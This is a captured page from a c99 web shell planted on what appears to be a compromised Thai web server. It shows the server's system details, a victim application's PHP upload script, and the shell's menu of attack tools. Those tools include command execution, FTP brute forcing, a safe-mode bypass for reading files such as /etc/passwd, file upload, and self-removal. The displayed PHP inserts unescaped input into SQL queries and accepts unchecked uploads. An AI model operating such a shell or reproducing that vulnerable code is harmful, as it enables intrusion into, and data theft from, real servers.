!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/QA/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     InsertReport.php (4.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    session_start
();

    
/** Set Timezone **/
    
date_default_timezone_set('Asia/Bangkok');
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS' );

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../includes/Function.php" );
        require_once( 
"../includes/FunctionDB.php" );
    
        
/**  Create Database Object  */
        
$dbObj = new DBConn;  
            
//=== SESSION
        
$Username $valid_user
        
$code  trim($code);
        
$Ind_code  trim($Ind_code);
        
$Report_name  htmlspecialchars(trim($Report_name));
        
//$conditionId  = htmlspecialchars(trim($conditionId));
        
$ReportId  trim($ReportId);
        
$ProjectId  trim($ProjectId);
        
$Stand_code  trim($Stand_code);
        

        
////////
        
$Path "../Qa_pic"
        
        
//###  Upload Image File
        
if( $_FILES['Filename']['name'] != "" ) {
            
//$Filename = $_FILES['Filename']['name'];
            //@copy( $_FILES['Filename']['tmp_name'] , $Path."/".$Filename );
            //@unlink( $_FILES['Filename']['tmp_name'] );

            
$Filename date('YmdHis').strrchr($_FILES['Filename']['name'], ".");
            @
copy$_FILES['Filename']['tmp_name'] , $QAPicPath.$Filename);
            @
unlink$_FILES['Filename']['tmp_name'] );                   
            
            
$sql "INSERT INTO qa_qareport_tb (Ind_code, projectId, Stand_code, code, Report_name, ReportId, Filename) VALUES('$Ind_code', '$projectId', '$Stand_code', '$code', '$Report_name', '$ReportId', '$Filename')"
            
mysql_query($sql);
            
//$sql = "INSERT INTO qa_qareport_tb (Report_name, projectId, Stand_code, Ind_code,code, conditionId,Filename)VALUES('ทดสอบ','13','1.1','','20120805214902.txt','','')"; 

            //InsertQAReport($Report_name,$code,$Ind_code,$conditionId,$Filename);
              
            //$msg.="<li>ระบบจัดเก็บข้อมูลเรียบร้อยแล้ว"; 
            //echo"<center>";
            //echo "<br><font face=\"Tahoma\" Size=\"2\" color=\"#FF0000\">กรุณา refresh หน้ารายการอีกครั้ง</font>";
            //echo "<br><input type=\"reset\" value=\"Close Windows\" onclick=\"javascript:parent.close();\" style=\"font-weight:bold;color:font-family:Tohoma;\">";     
            //echo"</center>";

            
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
            echo 
"<script>alert('ระบบจัดเก็บข้อมูลเรียบร้อยแล้ว');</script>";
            echo 
"<script>window.close(); window.opener.location.reload(); </script>";
            
        } 
# if
    
}
?>
<html>
<head>
<title></title>
<link rel="stylesheet" href="../css/style1.css" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874"></head>
<body bgcolor="#FFFFFF">
<!-- <form>
<br>
  <table width="68%" border="0" cellspacing="0"cellpadding="2"align="center">
    <tr>
<td><div align="center"><span><b><font color="#003366" size="4" face="Tahoma">::ฟอร์มการเพิ่มข้อมูล::</font></b></span></div></td>
</tr>
<tr>
<td>
<table width="74%" border="0" cellspacing="1"cellpadding="0"align="center" class="table">
          <tr> 
            <td bgcolor="#BFD0E6"> <div align="center"><b><font color="#003366" size="3" face="Tahoma">ระบบแจ้งการทำงาน</font></b></div></td>
          </tr>
          <tr> 
            <td bgcolor="#000000"> <table width="90%" border="0" cellspacing="0"cellpadding="2"align="center">
                <tr> 
                  <td><font color="#FFFFFF" size="4" face="Tahoma"><span><b><?php echo $msg;?></b></span></font></td>
                </tr>
              </table></td>
          </tr>
          <tr> 
            <td bgcolor="#BFD0E6"> <div align="center"><b><font color="#CCFF00"><?php echo $button;?></font></b></div></td>
          </tr>
        </table>
</td>
</tr>
</table>
<br>
<br>
</form> -->
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0092 ]--